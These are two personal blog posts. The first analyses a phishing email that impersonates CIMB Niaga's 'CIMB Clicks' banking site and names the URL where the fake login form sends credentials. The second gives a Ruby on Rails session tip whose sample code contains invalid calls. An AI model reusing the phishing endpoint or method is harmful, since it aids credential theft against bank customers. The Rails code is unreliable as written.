by

Simple analysis of a phising activity. Case: CIMB Niaga’s “CIMB Clicks”

Few days ago, I got an email from a local bank to update a CIMB Niaga internet banking account profile.
The email sender looks convincing, but wait, I don’t have an account at this bank!, why the hell did they sent this to me for ?

So this triggered my curiosity, and so i come up with simple analysis, so here goes….

First take a look at screenie from the email :

Notice the red highlights, the email is a real corporate account, check the website domain here
People will always trust a corporate account right?

Here’s the interesting part, the email told me that i have to update my internet banking account(in which i don’t have) in order to synchronize with their new updated secure system(so they said), and told me to download a file in order to fill out the new account information.
And if I don’t do it for the next 24 hours, my account will be freeze for security reason!
“what the fuck?, what kind of method is this ?”

Getting more curious, so i downloaded the file “CIMB Clicks.mht”

common people usually open the file straight after it finished downloaded without knowing what the file might do to their computer, it might be a virus or whatever…. well that is foolish.
First you need to know the last extension means, .mht file extension is one of HTML document format, stands for MHTML, a programming language to make websites (please search for it on google for detail explanation).
The difference between HTML and MHTML is, MHTML can combine resources inside one .mht file, we can put images, videos, etc in one .mht file, while HTML can’t.

When I open the file with “double click”, the default application that opens the file is internet browser
heres the screenie of the opened file:

Whoa! it looks similar to the real CIMB Clicks website:

The difference is in the URL(Uniform Resource Locator), look at the red highlights….

This hacking method known as phishing, a method that attempt to acquire sensitive information such as username or password by mimicking certain websites(internet banking, facebook, etc), usually the log-in form.
common people usually ignore this…

Then I look at source code behind the .mht file to see what will happen if i submit the form of the .mht file
look at this screenie:

look at the highlights part of the image, so when we submit the login information, the page will be redirected to “http://www.zaiedcool.com/images/logininfo.php”

but thankfully, The file “logininfo.php” is not exist, which is probably inside the “logininfo.php” file lies the script that will store my login information(username & password) to the hacker database.

Therefore i try to extract the file directly from the resource with “wget”, and yes it returns a “404 error” which means the file “logininfo.php” is not exist:

So who or what is responsible for this?

This can be from the person who holds the email account, maybe his/her PC got infected with keylogging virus, a virus that records every keyboard activity then sends it back to the hacker.
Where can you get infected with this kind virus?… Porn sites, betting sites, untrusted gaming sites, untrusted facebook applications, etc

We can also blame the system, crackers and hackers can break into vulnerable security system and holds control of the system, and then sends broadcast email without the system administrator knowing whats going on.

And lastly, here’s a little “whois” info about “Zaiedcool”, just in case one of CIMB niaga guys read this post:

That is all folks, hope this post will be useful to those who reads 🙂

*cheers

by

Ruby on Rails session: My own best practice !!!

Okay here’s my first post on non-human language topic, so bear with me 😀

So I’ve got some difficulties dealing with rails session a while ago…
after looking for solution on the net, and found nothing that’s really clear and meets my requirement,
in the end I ended up on the rails api and rails guide

But then again I have to admit I’m too lazy to read them, so i finally work my own shit up :))

here’s what i do :
i need the session to be available in the whole application, in order to do that you have to make a private method in the application_controller.rb file
for example, in my case i want an invoice session for a cart app
here’s what the content of the file might look like:

class ApplicationController < ActionController::Base
  protect_from_forgery
    helper_method :invoice_session
     
  private

  def invoice_session
    @invoice_session ||= session[:invoice_id]
  end 
end

well I think that’s it, after that you can set the session storage method on any controller for example
the cart_controller.rb index method that might look like this

class CartController < ApplicationController
  
  def index
      #Here's the session storing being placed
      #session[:session_name] = method (eg. Model.find[:blabla].field
      #below is an example
      session[:invoice_session] = Invoice.find[:first].invoice
  end
end

Now to retrieve the session is very simple, you can include the method earlier in the application_controller.rb which is the invoice_session in any controller or view

well that’s all folks, this is how I did it
hope you can find it usefull

*cheers